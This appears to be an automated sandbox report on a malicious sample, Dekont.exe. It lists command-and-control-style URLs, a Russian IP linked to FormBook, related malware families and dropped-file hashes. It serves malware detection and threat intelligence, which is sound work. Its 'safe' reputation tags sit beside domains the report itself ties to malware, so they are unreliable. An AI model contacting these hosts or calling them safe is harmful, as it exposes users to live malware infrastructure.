http://www.lkjuy.xyz/bc01/ | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nnevateknoloji.xyz/bc01/ | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.eals.latReferer: | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://excel.office.com | explorer.exe, 00000006.00000000.2089618463.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3854649429.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4533610517.0000000009C22000.00000004.00000001.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://schemas.micro | explorer.exe, 00000006.00000002.4527294039.0000000008870000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.4527411989.0000000008890000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000000.2087941103.0000000007DC0000.00000002.00000001.00040000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.omotech-dz.netReferer: | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.omotech-dz.net/bc01/www.y-language-menu.net | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.oko.events/bc01/ | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.y-language-menu.net/bc01/www.ebshieldsrenew.live | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lussalesapp.websiteReferer: | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hildrens-clothing.today/bc01/ | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.inancialenlightment.infoReferer: | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.qzxx.top | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.oko.events | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.qzxx.top/bc01/ | explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.48xc300mw.autosReferer: | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hildrens-clothing.today/bc01/www.olocaustaffirmer.net | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.48xc300mw.autos/bc01/ | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.avada-casino-tlj.buzz/bc01/www.qzxx.top | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ebshieldsrenew.live/bc01/ | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lussalesapp.website | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.48xc300mw.autos/bc01/www.avada-casino-tlj.buzz | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.olocaustaffirmer.netReferer: | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe | explorer.exe, 00000006.00000002.4536578423.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2094235679.000000000C4DC000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.y-language-menu.netReferer: | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.qzxx.topReferer: | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ar-accident-lawyer-389.today/bc01/www.nnevateknoloji.xyz | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | Dekont.exe, 00000000.00000002.2068088003.0000000002972000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.olocaustaffirmer.net/bc01/ | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.omotech-dz.net/bc01/ | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lkjuy.xyzReferer: | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.y-language-menu.net/bc01/ | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.eals.lat/bc01/www.lussalesapp.website | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.nnevateknoloji.xyz/bc01/www.eddogbrands.website | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://wns.windows.com/)s | explorer.exe, 00000006.00000000.2089618463.00000000099C0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4530151836.00000000099C0000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ebshieldsrenew.live | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hildrens-clothing.todayReferer: | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.inancialenlightment.info/bc01/ | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.autoitscript.com/autoit3/J | explorer.exe, 00000006.00000000.2095427766.000000000C8D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3097513506.000000000C8E7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094949963.000000000C8D7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3096503518.000000000C8D8000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ar-accident-lawyer-389.today/bc01/ | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.hildrens-clothing.today | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lussalesapp.website/bc01/ | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.eddogbrands.website/bc01/ | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.inancialenlightment.info/bc01/www.omotech-dz.net | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lkjuy.xyz | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lkjuy.xyz/bc01/www.inancialenlightment.info | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.lussalesapp.website/bc01/www.48xc300mw.autos | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.eddogbrands.website | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.olocaustaffirmer.net | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://outlook.com | explorer.exe, 00000006.00000000.2089618463.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3849680268.0000000009C92000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.4533709469.0000000009C96000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.omotech-dz.net | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.eddogbrands.website/bc01/www.lkjuy.xyz | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.avada-casino-tlj.buzzReferer: | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.inancialenlightment.info | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.ebshieldsrenew.live/bc01/www.oko.events | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.olocaustaffirmer.net/bc01/www.eals.lat | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.eals.lat | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
http://www.eddogbrands.websiteReferer: | explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://android.notify.windows.com/iOS | explorer.exe, 00000006.00000002.4522541380.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3850951608.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2086309850.00000000076F8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3096651186.00000000076F8000.00000004.00000001.00020000.00000000.sdmp | false
                                • URL Reputation: safe
                                unknown
                                http://www.nnevateknoloji.xyzexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.48xc300mw.autosexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.ebshieldsrenew.liveReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.avada-casino-tlj.buzzexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.ar-accident-lawyer-389.todayReferer:explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://api.msn.com/explorer.exe, 00000006.00000002.4530151836.0000000009ADB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2089618463.0000000009ADB000.00000004.00000001.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                unknown
                                http://crl.vexplorer.exe, 00000006.00000002.4517983808.0000000000F13000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.2077619011.0000000000F13000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.ar-accident-lawyer-389.todayexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.eals.lat/bc01/explorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.y-language-menu.netexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
                                http://www.oko.events/bc01/www.hildrens-clothing.todayexplorer.exe, 00000006.00000002.4538414224.000000000C9A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.3094067040.000000000C9A7000.00000004.00000001.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: safe
                                unknown
IP | Domain | Country | ASN | ASN Name | Malicious
185.26.122.70 | www.oko.events | Russian Federation | 62082 | HOSTLANDRU | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1517901
Start date and time: 2024-09-25 08:56:09 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 11m 18s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes: 12
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: Dekont.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@12/6@11/1
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 103
• Number of non-executed functions: 310
Cookbook Comments:
• Found application associated with file extension: .exe
• Override analysis time to 240000 for current running targets taking high CPU consumption
• Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
• Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size getting too big, too many NtCreateKey calls found.
• Report size getting too big, too many NtEnumerateKey calls found.
• Report size getting too big, too many NtOpenKey calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• VT rate limit hit for: Dekont.exe
Time | Type | Description
02:57:02 | API Interceptor | 1x Sleep call for process: Dekont.exe modified
02:57:04 | API Interceptor | 13x Sleep call for process: powershell.exe modified
02:57:12 | API Interceptor | 8293949x Sleep call for process: explorer.exe modified
02:57:47 | API Interceptor | 7285294x Sleep call for process: control.exe modified
                                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.oko.events | Quotation #10091.exe | malicious | FormBook | 185.26.122.70
www.oko.events | PAGO_200924.exe | malicious | FormBook | 185.26.122.70
Match | Associated Sample Name / URL | Detection | Threat Name | Context
HOSTLANDRU | Wave.exe | malicious | Discord Token Stealer, Orcus, SugarDump | 185.37.62.158
HOSTLANDRU | DFpUKTL6kg.exe | malicious | DCRat | 185.26.122.81
HOSTLANDRU | http://mydpd.space/ | malicious | DCRat, PureLog Stealer | 185.26.122.30
HOSTLANDRU | HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe | malicious | DCRat | 185.26.122.79
HOSTLANDRU | yk2Eh24FDd.exe | malicious | Unknown | 185.26.122.81
HOSTLANDRU | hT0xyYJthf.exe | malicious | Unknown | 185.26.122.81
HOSTLANDRU | https://hideuri.com/EXWJgm | malicious | Unknown | 185.26.122.79
HOSTLANDRU | rwDENO48jg.elf | malicious | Mirai, Moobot | 185.221.215.184
HOSTLANDRU | i21878JK11.exe | malicious | DCRat | 185.26.122.80
HOSTLANDRU | i21878JK11.exe | malicious | DCRat | 185.26.122.80
                                No context
                                No context
Process: C:\Users\user\Desktop\Dekont.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1216
Entropy (8bit): 5.34331486778365
Encrypted: false
SSDEEP: 24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5: 1330C80CAAC9A0FB172F202485E9B1E8
SHA1: 86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256: B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512: 75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious: true
Reputation: high, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: data
Category: dropped
Size (bytes): 2232
Entropy (8bit): 5.380805901110357
Encrypted: false
SSDEEP: 48:lylWSU4xympjgs4RIoU99tK8NPZHUl7u1iMuge//ZM0Uis:lGLHxvCsIfA2KRHmOugrOs
MD5: C748439F41CEA9024CA9F3BCFA7AF9F4
SHA1: C3D78DB461713EEFADF38AC6EC5E280FB7DD5A6B
SHA-256: 631883A48CA5262BCAB48E8D17A64B76AB76025FFAA398F4C4A03FC000619DB3
SHA-512: E7FC99DA112597A089468E6BD384720226DC39C6851B4FFBBE3E4881508EABAA554D021EB41527D34E25D84433ADDE82BE1F0DF9D7A8D8DED977D4CF4931CFAD
Malicious: false
                                Preview:@...e.................................^..............@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512: 5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious: false
Preview: # PowerShell test file to determine AppLocker lockdown mode
Process: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type: ASCII text, with no line terminators
Category: dropped
Size (bytes): 60
Entropy (8bit): 4.038920595031593
Encrypted: false
SSDEEP: 3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA1: 6AB83620379FC69F80C0242105DDFFD7D98D5D9D
